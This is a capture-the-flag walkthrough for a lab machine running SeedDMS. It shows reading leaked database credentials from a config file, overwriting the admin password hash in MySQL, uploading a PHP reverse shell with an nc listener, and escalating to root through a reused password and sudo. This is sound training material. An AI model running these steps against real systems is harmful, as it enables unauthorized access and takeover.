Hack_Me_Please revolves around a vulnerable SeedDMS installation. Leaked database credentials allow direct MySQL access, where we can alter the admin hash, log into the web app, and upload a PHP reverse shell. Privilege escalation is achieved via a reused system password and unrestricted sudo.
Target: 10.10.10.14
Initial vector: SeedDMS config leak → DB access → admin password overwrite → file upload RCE
Privilege escalation: reused user password → sudo bash
Initial web enumeration reveals:
/img /js /css /fonts /server-status
Inspecting main.js:
http://10.10.10.14/js/main.js -> /seeddms51x/seeddms-5.1.22/
Enumerate SeedDMS:
$ nikto -url http://10.10.10.14/seeddms51x/seeddms-5.1.22/ $ ffuf -u http://10.10.10.14/seeddms51x/seeddms-5.1.22/FUZZ \ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
Nothing useful inside the version directory, so move up:
$ ffuf -u http://10.10.10.14/seeddms51x/FUZZ \ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -> www -> data -> conf -> pear
Check config:
http://10.10.10.14/seeddms51x/conf/settings.xml
Database credentials:
dbUser: seeddms dbPass: seeddms
Connect to MySQL:
$ mysql -h 10.10.10.14 -u seeddms -p --skip-ssl-verify-server-cert
Enumerate users:
mysql> SELECT * FROM users; -> saket saurav Saket@#$1337
SeedDMS users:
mysql> SELECT * FROM tblUsers; +----+-------+----------------------------------+---------------+ | id | login | pwd | fullName | +----+-------+----------------------------------+---------------+ | 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | +----+-------+----------------------------------+---------------+
Instead of cracking the hash, overwrite it with a known MD5:
mysql> UPDATE tblUsers
SET pwd='5f4dcc3b5aa765d61d8327deb882cf99'
WHERE id=1;
-- 'password'
Now log in as admin / password to SeedDMS.
Using the SeedDMS interface (and referencing exploit 47022 from searchsploit), upload a PHP reverse shell:
/usr/share/webshells/php-reverse-shell.php
Listener:
$ nc -nlvp 443
Trigger the shell via the document path, e.g.:
http://10.10.10.14/seeddms51x/data/1048576//1.php
You now have a shell as the web user.
Switch to the database user whose password we saw earlier:
$ su saket Password: Saket@#$1337
Check sudo:
$ sudo -l $ sudo bash # whoami root
Root shell obtained.
Hack_Me_Please is a neat SeedDMS‑focused machine: config disclosure leads to DB access, admin password overwrite enables web login and file upload RCE, and a reused user password combined with unrestricted sudo yields instant root. It’s a good reminder that configuration files and password reuse are often the weakest links.